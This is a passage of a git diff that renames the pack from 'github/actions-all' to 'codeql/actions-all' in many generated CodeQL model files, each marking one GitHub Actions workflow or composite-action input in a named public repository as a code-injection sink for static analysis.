diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index 46950d380cbb..494e71db707b 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index 2e3c2530ebae..200f6bbfc437 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index 58f3d831423d..a542370c7de2 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index dfa20e1f9d74..8b529012be2b 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index 144c4e456dc1..defeb5f7974f 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index 51348fb1b565..7eba6fb3b004 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index c3fa787b2887..fc8085843ddc 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 9845c089b322..2d831ccbcedf 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 2986040e8cd6..b8892f32d7fe 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 7dafcd5b71bc..3809c827dda9 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 1b5fb0e1d970..88f4246b1623 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index 28ec54f1d9dd..35d394a116fc 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index 21f35339952a..234ed7fef076 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index 594b0cc9bb99..e9ad23c8331e 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index a2fbd510bb29..49ac7d2bf717 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 927cbd449e35..99041db6e26d 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index 52037a671cf1..dd132b20a05b 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index b71a87193b68..e87804d0cf85 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 24361a7d29eb..0927d449d371 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index be71c38f1242..a98bbaed725a 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 889edaac1bba..0beb8e432fe6 100644 
--- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index b2b970152de6..0d0f030c6233 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index f885a44f46e6..3574c02b4ed0 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index 10f06693d26a..1ce82c53df5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 43d0fe1c2ce6..f2eec6681d3e 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 4fb13f0a18cc..a4a008154f56 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 96b73aa06de6..d85bd42f7a43 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 554974bfe6f5..391b22d88672 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index f1c6ec345d19..962623cd9133 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 2cfa8a46c83e..99ce22f3f64f 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index 8c3c5a585028..e52acbad13ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index aa75ce39295d..989f9aae9376 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index e9dd33c6f175..e34a4b3910b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index a0bd22ad352e..9a1991ddc814 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index fb98c6a7d9b8..0316d82a5e3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index 0c108422a94e..16d8ba2b9267 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index c820724bd71e..1a59c9bf160b 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 51d32bde4ba7..fb13f2451d9d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index b747a4a27df1..ac92d435f745 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index c5c26bc7926f..278801efa2d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 62a1a853937d..f426656c0769 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index b6c0c1b5e644..17d1c687f62c 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index 005db8e9ddce..4a8e4cc4378e 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index a1090c45ae08..803335289524 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 051aacfeee04..b1a056e28364 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 1fb380a3a725..906eb810c89a 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index a8b8234e1fc5..75469b1a80a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 108bbad1c072..192f1d690b5a 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 42ed67f3d208..d8f7648e808f 100644 
--- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index a664d6063e30..9789709eac7e 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 6270ab5842ee..60e388c076bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git 